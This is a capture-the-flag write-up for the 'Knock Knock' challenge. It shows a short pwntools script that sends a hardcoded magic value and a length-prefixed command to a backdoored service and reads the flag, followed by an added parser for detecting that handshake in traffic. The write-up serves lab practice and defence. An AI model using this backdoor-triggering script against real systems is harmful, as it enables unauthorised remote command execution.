HackTheBox x Synack CTF 2021: Knock Knock
TL;DR
- The binary contains a hidden backdoor command handler.
- A hardcoded magic value unlocks privileged command execution.
- Commands are sent as a payload prefixed with a single length byte (so a command can be at most 255 bytes).
- Sending `cat flag.txt` through the backdoor prints the flag.
Solution
backdoor.py

```python
from pwn import *

context.log_level = 'DEBUG'
# 'ip' is the placeholder kept from the writeup; the challenge host goes here
io = remote('ip', 31337)

cmd = b'command:cat flag.txt'
# handshake: the hardcoded magic value unlocks the hidden command handler
io.send(b'8f4328c40b1aa9409012c7406129f04b')
# one-byte length prefix, then the command itself
io.send(bytes([len(cmd)]))
io.send(cmd)
io.interactive()
```
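The wire format the script above relies on, written out as a small parser that a defender could run over captured traffic to spot the handshake, is an added example and not part of the original writeup. It assumes exactly what backdoor.py sends: the 32-byte magic value, one length byte, then that many bytes of command; the sample capture is constructed.

```python
MAGIC = b'8f4328c40b1aa9409012c7406129f04b'  # value taken from backdoor.py
CMD_PREFIX = b'command:'


def parse_backdoor_frames(stream: bytes):
    """Walk a captured byte stream and return every frame that matches the
    backdoor handshake: MAGIC, one length byte, then exactly that many bytes.
    Truncated frames are reported with a reason so a detector can still alert."""
    frames = []
    pos = 0
    while True:
        idx = stream.find(MAGIC, pos)
        if idx == -1:
            break
        body = idx + len(MAGIC)
        if body >= len(stream):
            frames.append({'offset': idx, 'complete': False, 'reason': 'missing length byte'})
            break
        length = stream[body]
        payload = stream[body + 1:body + 1 + length]
        if len(payload) < length:
            frames.append({'offset': idx, 'complete': False, 'reason': 'truncated payload'})
            break
        command = payload[len(CMD_PREFIX):] if payload.startswith(CMD_PREFIX) else None
        frames.append({'offset': idx, 'complete': True, 'length': length,
                       'payload': payload, 'command': command})
        pos = body + 1 + length
    return frames


def build_frame(cmd: bytes) -> bytes:
    """Encode one frame the way backdoor.py does; used here only to construct
    the sample capture. A one-byte length field caps the command at 255 bytes,
    which is why bytes([len(cmd)]) in the script would fail above that."""
    if len(cmd) > 255:
        raise ValueError('command longer than a one-byte length field allows')
    return MAGIC + bytes([len(cmd)]) + cmd


# Constructed sample capture: unrelated traffic, one full frame, then a cut-off one.
SAMPLE = b'hello\n' + build_frame(b'command:cat flag.txt') + MAGIC + b'\x10command:'

if __name__ == '__main__':
    for frame in parse_backdoor_frames(SAMPLE):
        print(frame)
```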